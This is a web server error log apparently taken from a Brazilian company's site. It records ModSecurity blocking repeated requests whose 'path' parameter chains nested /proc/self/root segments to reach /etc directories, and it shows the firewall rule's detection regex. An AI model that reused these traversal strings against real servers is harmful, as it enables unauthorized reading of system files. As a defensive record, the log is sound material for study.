https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Tue Mar 17 22:32:17.127818 2026] [proxy_fcgi:error] [pid 15051:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48196] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:32:24.710938 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:45512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAqMdf6f5d65gmYZRwQgAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:32:39.101830 2026] [proxy_fcgi:error] [pid 16560:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48632] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:33:00.142675 2026] [proxy_fcgi:error] [pid 16560:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49150] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:33:02.672215 2026] [:error] [pid 25836:tid 140411548894976] [client 74.7.241.31:40618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAzoh-PF_25v4hFRCcKQAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:33:22.133829 2026] [proxy_fcgi:error] [pid 2598:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49670] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:33:26.503203 2026] [mime_magic:error] [pid 31803:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:4944] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 22:33:26.503333 2026] [access_compat:error] [pid 31803:tid 140411733534464] [client 216.73.216.191:4944] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Tue Mar 17 22:33:33.314312 2026] [:error] [pid 18211:tid 140411666392832] [client 74.7.241.31:59870] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboA7RcIZFNFgEhGGCRH2gAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:33:37.682258 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:52224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboA8eoXxyEfFpUF8f8N0AAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:33:40.224721 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.244.43:55880] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboA8-yqAr6etmhZHNpXagAAAEA"]
[Tue Mar 17 22:33:44.053874 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50144] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:33:45.921691 2026] [:error] [pid 16560:tid 140411582465792] [client 74.7.241.31:37142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboA-a6gUSg3B_dEMdIYFQAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:33:48.122035 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:44132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboA_Na6ubjKNq_cu4Y3GAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:33:52.129314 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.243.128:49454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBABj0p0SRWAqcjGGq4wAAAwk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:33:53.027311 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:60594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBAQkwaGbbGflqUZC0cwAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:33:54.567007 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:60604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBAuyqAr6etmhZHNpXbAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:33:56.979507 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:60610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBBNY0UrI5A3LftIwvhgAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:33:59.965679 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:39138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBB9a6ubjKNq_cu4Y3HgAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:34:06.165858 2026] [proxy_fcgi:error] [pid 2598:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50608] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:34:08.149426 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:39152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBENa6ubjKNq_cu4Y3JQAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:34:11.639376 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:58298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBE8df6f5d65gmYZRwYAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:34:15.138821 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:58308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBF9Y0UrI5A3LftIwvigAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:34:18.687303 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:58322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBGuyqAr6etmhZHNpXcQAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:34:29.133855 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51056] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:34:30.196305 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.241.31:40666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBJuyqAr6etmhZHNpXdgAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:34:30.663684 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.228.61:42012] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboBJta6ubjKNq_cu4Y3KAAAA1g"]
[Tue Mar 17 22:34:37.719465 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:49464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBLeoXxyEfFpUF8f8N6gAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:34:38.408498 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:55220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBLgkwaGbbGflqUZC0gQAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:34:45.237908 2026] [:error] [pid 18211:tid 140411658000128] [client 74.7.241.31:41570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBNRcIZFNFgEhGGCRH6AAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:34:52.129817 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51464] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:35:16.165831 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51820] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:35:17.904427 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:49912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBVcdf6f5d65gmYZRwjQAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
